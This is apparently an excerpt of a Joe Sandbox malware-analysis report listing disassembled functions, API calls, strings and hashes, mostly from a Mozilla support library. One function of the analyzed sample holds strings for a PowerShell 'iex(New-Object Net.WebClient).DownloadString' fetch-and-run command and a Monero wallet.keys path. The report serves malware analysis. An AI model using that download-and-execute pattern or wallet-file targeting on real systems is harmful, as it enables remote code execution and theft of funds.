Instruction ID: 8a4e4d232d8c695056e70d0e3de8fdaf23a19fc81d7256e76eb7b140880a4fc2
Opcode Fuzzy Hash: 9956e4d29cc473ffc7fa1ed7d9751bc67390ca44a340ad85e89fddfdc68e6e42
Instruction Fuzzy Hash: 1221BC752006029FDB24DF29D888A5AB7B5BF8830CF24082DE55BD3B41DB31F969CB59

Function 6C6BF540 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C6B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C684A68), ref: 6C6B945E
Part of subcall function 6C6B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C6B9470
Part of subcall function 6C6B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C6B9482
Part of subcall function 6C6B9420: __Init_thread_footer.LIBCMT ref: 6C6B949F

GetCurrentThreadId.KERNEL32 ref: 6C6BF559
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C6BF561

Part of subcall function 6C6B94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C6B94EE
Part of subcall function 6C6B94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C6B9508

GetCurrentThreadId.KERNEL32 ref: 6C6BF577
AcquireSRWLockExclusive.KERNEL32(6C6FF4B8), ref: 6C6BF585
ReleaseSRWLockExclusive.KERNEL32(6C6FF4B8), ref: 6C6BF5A3

Strings

[I %d/%d] profiler_resume_sampling, xrefs: 6C6BF499
[D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6C6BF56A
[I %d/%d] profiler_resume, xrefs: 6C6BF239
[I %d/%d] profiler_pause_sampling, xrefs: 6C6BF3A8

Memory Dump Source

Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
API String ID: 2848912005-2840072211
Opcode ID: 687b46bf4ad0d60fbf97dd6e567e2e01a5d650596f01ca286131d98661cabb2b
Instruction ID: b60560caeb40cccd978832d551a2d1389d2ab47c8d2abb43e4d590c8d0ae9750
Opcode Fuzzy Hash: 687b46bf4ad0d60fbf97dd6e567e2e01a5d650596f01ca286131d98661cabb2b
Instruction Fuzzy Hash: DAF0547A6002049BEB006F66A88895E77BFFFD729DF000415EA6593702DB754806C77E

Function 6C6B05F0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 31stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(<jemalloc>,?,?,?,?,6C6ACFAE,?,?,?,6C6731A7), ref: 6C6B05FB
_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,<jemalloc>,00000000,6C6ACFAE,?,?,?,6C6731A7), ref: 6C6B0616
strlen.API-MS-WIN-CRT-STRING-L1-1-0(: (malloc) Error in VirtualFree(),?,?,?,?,?,?,?,6C6731A7), ref: 6C6B061C
_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,: (malloc) Error in VirtualFree(),00000000,?,?,?,?,?,?,?,?,6C6731A7), ref: 6C6B0627

Strings

<jemalloc>, xrefs: 6C6B05FA, 6C6B060F
: (malloc) Error in VirtualFree(), xrefs: 6C6B061B, 6C6B0625

Memory Dump Source

Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: _writestrlen
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 2723441310-2186867486
Opcode ID: 6297b76c3663be4c7ea528a0ec1fe5dfb7e62dcb0351d3c95e8d9d77dab87220
Instruction ID: 77f17740782a811ad2d48a0e3e683afc2b5590e89693ebbc5f72f88c815c23f0
Opcode Fuzzy Hash: 6297b76c3663be4c7ea528a0ec1fe5dfb7e62dcb0351d3c95e8d9d77dab87220
Instruction Fuzzy Hash: 1FE086E290601037F514225A7C8ADBB7A1CDBC6134F04003AFE0D43301E94AAD1951FA

Function 6C6805F0 Relevance: 9.2, APIs: 6, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 875321ad875b0758aacc97abb2aac577ee9a7eacb8681cb0075a18cffc676d6d
Instruction ID: 8d089980d129f17d6d22bd3c460bcdbb039e9a994919aed92a282c6bca511694
Opcode Fuzzy Hash: 875321ad875b0758aacc97abb2aac577ee9a7eacb8681cb0075a18cffc676d6d
Instruction Fuzzy Hash: 8BA14AB0A02645CFDB24CF29C594A99FBF1BF49304F448A6ED45A97B00E731A985CFA4

Function 6C6D14A0 Relevance: 9.2, APIs: 6, Instructions: 176threadtimeCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C6D14C5
?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C6D14E2
GetCurrentThreadId.KERNEL32 ref: 6C6D1546
InitializeConditionVariable.KERNEL32(?), ref: 6C6D15BA
free.MOZGLUE(?), ref: 6C6D16B4

Memory Dump Source

Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: CurrentThread$ConditionInitializeNow@Stamp@mozilla@@TimeV12@_Variablefree
String ID:
API String ID: 1909280232-0
Opcode ID: d87de9ec82f7de81effe7751b196bb776a8d377e9b11ed042cc4bd8f70877c03
Instruction ID: f394cbac3c3d8b47307519e35e12f3c4c6f095c2f65188829e6e68ddf796e467
Opcode Fuzzy Hash: d87de9ec82f7de81effe7751b196bb776a8d377e9b11ed042cc4bd8f70877c03
Instruction Fuzzy Hash: 0661FD72A007409BDB218F21C880BDAB7B1FF8A318F05851DED8A57701DB75E949CB9A

Function 6C6CDC50 Relevance: 9.1, APIs: 6, Instructions: 104timethreadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C6CDC60
AcquireSRWLockExclusive.KERNEL32(?,?,?,6C6CD38A,?), ref: 6C6CDC6F
free.MOZGLUE(?,?,?,?,?,6C6CD38A,?), ref: 6C6CDCC1
ReleaseSRWLockExclusive.KERNEL32(?,?,?,?,?,?,?,6C6CD38A,?), ref: 6C6CDCE9
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?,6C6CD38A,?), ref: 6C6CDD05
??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000001,?,?,?,6C6CD38A,?), ref: 6C6CDD4A

Memory Dump Source

Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: ExclusiveLockStampTimeV01@@Value@mozilla@@$AcquireCurrentReleaseThreadfree
String ID:
API String ID: 1842996449-0
Opcode ID: 084958399cf68daf00241f846c199e68ca59a1c5c8db314d96a79ea24b86dfe1
Instruction ID: 5f8b6ee52171de9c5daf5d629b5abf3e41294ec5bf70a6e0015562b086640966
Opcode Fuzzy Hash: 084958399cf68daf00241f846c199e68ca59a1c5c8db314d96a79ea24b86dfe1
Instruction Fuzzy Hash: BF418DB5B00205CFCB00CF99C88099AB7FAFF89314B554569DA46ABB10DB71FC01CB99

Function 0019C23D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

memset.MSVCRT ref: 0019C2AE
___crtGetStringTypeA.LIBCMT ref: 0019C2DB
___crtLCMapStringA.LIBCMT ref: 0019C2FB
___crtLCMapStringA.LIBCMT ref: 0019C320

Strings

, xrefs: 0019C285

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: String___crt$Typememset
String ID:
API String ID: 3530896902-3916222277
Opcode ID: d8b59675832c7bcb0dbbb11c85118ac1a48557f4cbe34c03fbffc8ccb46d2367
Instruction ID: efe3aa0d26ec477dcbb713bc57a44bb18e0885e94ae3a4e91402054434154699
Opcode Fuzzy Hash: d8b59675832c7bcb0dbbb11c85118ac1a48557f4cbe34c03fbffc8ccb46d2367
Instruction Fuzzy Hash: 3641E77050079C5EDF258B64CD85BFBBBF9AB45704F1884E8E5C686182E3719B458FA0

Function 6C6AF440 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103fileCOMMON

Download Yara Rule

APIs

GetFileInformationByHandle.KERNEL32(00000000,?), ref: 6C6AF480

Part of subcall function 6C67F100: LoadLibraryW.KERNEL32(shell32,?,6C6ED020), ref: 6C67F122
Part of subcall function 6C67F100: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 6C67F132

CloseHandle.KERNEL32(00000000), ref: 6C6AF555

Part of subcall function 6C6814B0: wcslen.API-MS-WIN-CRT-STRING-L1-1-0(6C681248,6C681248,?), ref: 6C6814C9
Part of subcall function 6C6814B0: memcpy.VCRUNTIME140(?,6C681248,00000000,?,6C681248,?), ref: 6C6814EF

Part of subcall function 6C67EEA0: memcpy.VCRUNTIME140(?,?,?), ref: 6C67EEE3

CreateFileW.KERNEL32 ref: 6C6AF4FD
GetFileInformationByHandle.KERNEL32(00000000), ref: 6C6AF523

Strings

\oleacc.dll, xrefs: 6C6AF4CB

Memory Dump Source

Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: FileHandle$Informationmemcpy$AddressCloseCreateLibraryLoadProcwcslen
String ID: \oleacc.dll
API String ID: 2595878907-3839883404
Opcode ID: 2401c0f2dcae2fb755b7c7be94d4958dbffec647d44a208d6bcdee7fdebabaae
Instruction ID: 95a9cd6dd354a4cbdc1b96615f5018a7cf5906068dbbe535fc77d0dfb6b60d67
Opcode Fuzzy Hash: 2401c0f2dcae2fb755b7c7be94d4958dbffec647d44a208d6bcdee7fdebabaae
Instruction Fuzzy Hash: 1C41B3706087109FE720DF69D884B9AB7F4AF95318F104E1CF5A083650EB70D94ACB9B

Function 001927A0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON

Download Yara Rule

APIs

Part of subcall function 0019A110: lstrcpy.KERNEL32(001A0DFF,00000000), ref: 0019A158

Part of subcall function 0019A380: lstrlen.KERNEL32(?,013A8830,?,\Monero\wallet.keys,001A0DFF), ref: 0019A395
Part of subcall function 0019A380: lstrcpy.KERNEL32(00000000), ref: 0019A3D4
Part of subcall function 0019A380: lstrcat.KERNEL32(00000000,00000000), ref: 0019A3E2

Part of subcall function 0019A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0019A342
Part of subcall function 0019A2F0: lstrcat.KERNEL32(00000000), ref: 0019A352

Part of subcall function 0019A270: lstrcpy.KERNEL32(?,001A0DFF), ref: 0019A2D5

ShellExecuteEx.SHELL32(0000003C), ref: 00192895

Strings

-nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 001927D4
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00192814
')", xrefs: 001927C3
<, xrefs: 00192849

Memory Dump Source

Source File: 00000000.00000002.2265894481.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true

Associated: 00000000.00000002.2265878260.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001BC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000213000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000021F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000244000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000271000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000027D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000280000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000307000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.0000000000327000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2265894481.000000000032D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.00000000003C0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000630000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000652000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.000000000065A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266225551.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266462885.0000000000669000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266565321.0000000000807000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2266581334.0000000000808000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_180000_file.jbxd

Similarity

API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
API String ID: 3031569214-898575020
Opcode ID: df2a5398791e41f99f6e172a213d199b41102228520ce2d9167cc09103bfa099
Instruction ID: 275d8afb77b48c7f0fcb52831e2a4fd56d8e35dd5f6d38fd3462cdd7d952d694
Opcode Fuzzy Hash: df2a5398791e41f99f6e172a213d199b41102228520ce2d9167cc09103bfa099
Instruction Fuzzy Hash: 2641CC71D102089ADF19FBA0C896BDDBB78AF25300F804529F416671A2EF712A4DDFD2

Function 6C6D74A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(00000000), ref: 6C6D7526
__Init_thread_footer.LIBCMT ref: 6C6D7566
__Init_thread_footer.LIBCMT ref: 6C6D7597

Strings

UnmapViewOfFile2, xrefs: 6C6D7552
kernel32.dll, xrefs: 6C6D7557

Memory Dump Source

Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: Init_thread_footer$ErrorLast
String ID: UnmapViewOfFile2$kernel32.dll
API String ID: 3217676052-1401603581
Opcode ID: 32a74874c14b7cb24b352903ec55dc3313c147c05b05bd34e210ef51ac4586b9
Instruction ID: 4ed941e13e5acb950da6ad9c3fe26dac6515180091c2a906618d4c137afc43a0
Opcode Fuzzy Hash: 32a74874c14b7cb24b352903ec55dc3313c147c05b05bd34e210ef51ac4586b9
Instruction Fuzzy Hash: 7A21F5317005019BCB158FEAE895E99B3B7EB87325F064529E82587F40CB31B802CE9F

Function 6C6DC410 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(ntdll.dll,?,6C6DC0E9), ref: 6C6DC418
GetProcAddress.KERNEL32(00000000,NtQueryVirtualMemory), ref: 6C6DC437
FreeLibrary.KERNEL32(?,6C6DC0E9), ref: 6C6DC44C

Strings

NtQueryVirtualMemory, xrefs: 6C6DC431
ntdll.dll, xrefs: 6C6DC413

Memory Dump Source

Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: NtQueryVirtualMemory$ntdll.dll
API String ID: 145871493-2623246514
Opcode ID: d87170b1200daa32979419512649dc051f49d00aa40abe16611bdddead90e97b
Instruction ID: c996828b5942082b6b8e2d1c67a5d7e0f7bb3d2bb249456794d82259501d548b
Opcode Fuzzy Hash: d87170b1200daa32979419512649dc051f49d00aa40abe16611bdddead90e97b
Instruction Fuzzy Hash: B8E09271715309ABDF006F73AA887217BFAAB4B345F044116AA35D2B10EBB4D002CA5E

Function 6C674DE0 Relevance: 7.6, APIs: 5, Instructions: 133stringCOMMON

Download Yara Rule

APIs

?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C674E5A
?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C674E97
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6C674EE9
memcpy.VCRUNTIME140(?,?,00000000), ref: 6C674F02
?CreateExponentialRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?), ref: 6C674F1E

Memory Dump Source

Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Builder@2@@CreateRepresentation@$Ascii@DecimalDtoaExponentialMode@12@memcpystrlen
String ID:
API String ID: 713647276-0
Opcode ID: db4f394fc8a03d7614d901dcc203f6446004040c8934e939372a21b9b70dc86d
Instruction ID: e31991be02ecc7b1a0c37c1cd5a997c5229e3c9bd155eeba8304e9c47a12eea8
Opcode Fuzzy Hash: db4f394fc8a03d7614d901dcc203f6446004040c8934e939372a21b9b70dc86d
Instruction Fuzzy Hash: 8141F0716087019FC721CF29C8849ABBBE4BF8A354F108E1DF56687640DBB0E955CFA6

Function 6C681530 Relevance: 7.6, APIs: 5, Instructions: 98COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(-00000002,?,6C68152B,?,?,?,?,6C681248,?), ref: 6C68159C
memcpy.VCRUNTIME140(00000023,?,?,?,?,6C68152B,?,?,?,?,6C681248,?), ref: 6C6815BC
moz_xmalloc.MOZGLUE(-00000001,?,6C68152B,?,?,?,?,6C681248,?), ref: 6C6815E7
free.MOZGLUE(?,?,?,?,?,?,6C68152B,?,?,?,?,6C681248,?), ref: 6C681606
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,6C68152B,?,?,?,?,6C681248,?), ref: 6C681637

Memory Dump Source

Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: moz_xmalloc$_invalid_parameter_noinfo_noreturnfreememcpy
String ID:
API String ID: 733145618-0
Opcode ID: 06631a83c1c3e1d099ceb50881c0dedc18b2fd1fb2d79e6f14d6d6865bd6ab99
Instruction ID: d7f3d4f5142a85b999d67a1e89b611d21ce6c77a386dd775177e644c72e730be
Opcode Fuzzy Hash: 06631a83c1c3e1d099ceb50881c0dedc18b2fd1fb2d79e6f14d6d6865bd6ab99
Instruction Fuzzy Hash: E9312CB19011059BC7148E7CD8504AE77A5FB863747240B2DE433DBBD4EB30D94587AA

Function 6C6DAD70 Relevance: 7.6, APIs: 5, Instructions: 93COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000000,?,00000000,?,?,6C6EE330,?,6C69C059), ref: 6C6DAD9D

Part of subcall function 6C68CA10: malloc.MOZGLUE(?), ref: 6C68CA26

memset.VCRUNTIME140(00000000,00000000,00000000,00000000,?,?,6C6EE330,?,6C69C059), ref: 6C6DADAC
free.MOZGLUE(?,?,?,?,00000000,?,?,6C6EE330,?,6C69C059), ref: 6C6DAE01
GetLastError.KERNEL32(?,00000000,?,?,6C6EE330,?,6C69C059), ref: 6C6DAE1D
GetLastError.KERNEL32(?,00000000,00000000,00000000,?,?,?,00000000,?,?,6C6EE330,?,6C69C059), ref: 6C6DAE3D

Memory Dump Source

Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2294315502.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294377143.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294397235.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2294418810.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: ErrorLast$freemallocmemsetmoz_xmalloc
String ID:
API String ID: 3161513745-0
Opcode ID: cd440bd74a7659d025e7a607f88f10a6cd912c64e24306336891543727bc806f
Instruction ID: b2c561d380d4368a3de6d1abb3a727a147de282b73418beaab639840acbb5f67
Opcode Fuzzy Hash: cd440bd74a7659d025e7a607f88f10a6cd912c64e24306336891543727bc806f
Instruction Fuzzy Hash: E43186B19052159FD710DF798C44AABBBF8EF49710F15442DE85AD7700E734E805CBA8

Function 6C67B4C0 Relevance: 7.6, APIs: 5, Instructions: 84COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 6C67B532
moz_xmalloc.MOZGLUE(?), ref: 6C67B55B
memset.VCRUNTIME140(00000000,00000000,?), ref: 6C67B56B
wcsncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?), ref: 6C67B57E
free.MOZGLUE(00000000), ref: 6C67B58F

Memory Dump Source

Source File: 00000000.00000002.2294330236.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

